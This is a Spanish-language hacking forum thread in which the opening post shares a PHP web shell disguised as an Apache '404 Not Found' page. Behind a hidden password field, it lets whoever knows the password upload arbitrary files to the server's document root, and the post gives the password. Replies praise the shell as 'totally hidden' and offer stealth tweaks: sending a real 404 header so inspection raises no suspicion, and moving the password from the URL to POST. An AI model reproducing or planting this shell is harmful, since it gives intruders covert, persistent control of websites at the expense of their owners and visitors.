Hola gente,aquí les dejo un uploader oculto:
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache Server at <?php echo $_SERVER['SERVER_NAME']; ?> Port 80</address>
<style>
input { margin:0;background-color:#fff;border:1px solid #fff; }
</style>
<center>
<form method="post"><p>
<center><input type="password" name="pw" size="25" value=""></center>
</form></p></center>
<?php
if(empty($_POST["pw"])==0){if(md5($_POST["pw"])=="76ee3de97a1b8b903319b7c013d8c877"){if(empty($_FILES["A"])==0){
if(move_uploaded_file($_FILES['A']['tmp_name'],$_SERVER["DOCUMENT_ROOT"].'/'.$_FILES['A']['name'])==1){echo "<center>Archivo subido!</center>";}
}else{echo '<form enctype="multipart/form-data" action="'.$_SERVER["REQUEST_URI"].'" method="POST"><center><input name="A" type="file"><input type="submit" value="Subir"></center></form>';}exit();}}
?>
Password: upload
Saludos.
Genial!, me encanta este tipo de shells, totalmente ocultas :D. Unicamente... podrias hacer que no apareciera la password en la url??
yo tambien uso lo mismo para mis tools en php.
Buenísimo! Lo uníco que agregaría es un header() con el 404 para que cualquiera que ande con una extensión que le permita ver las headers no sospeche...
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Genial!, me encanta este tipo de shells, totalmente ocultas :D. Unicamente... podrias hacer que no apareciera la password en la url??
Lamentablemente la contraseña saldrá en la URL siempre.
Saludos.
Si envías la pass por el método POST no aparecerá en la URL.
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Genial!, me encanta este tipo de shells, totalmente ocultas :D. Unicamente... podrias hacer que no apareciera la password en la url??
Lamentablemente la contraseña saldrá en la URL siempre.
Saludos.
Si envías la pass por el método POST no aparecerá en la URL.
Para los que no saben, habría que editar las siguientes lineas por estas:
<form><p>
<center><input type="password" name="pw" size="25" value=""></center>
</form></p></center>
<?php
if(empty($_GET["pw"])==0){if(md5($_GET["pw"])=="202cb962ac59075b964b07152d234b70")Por:
<form method="post"><p>
<center><input type="password" name="pw" size="25" value=""></center>
</form></p></center>
<?php
if(empty($_POST["pw"])==0){if(md5($_POST["pw"])=="202cb962ac59075b964b07152d234b70")Un saludo.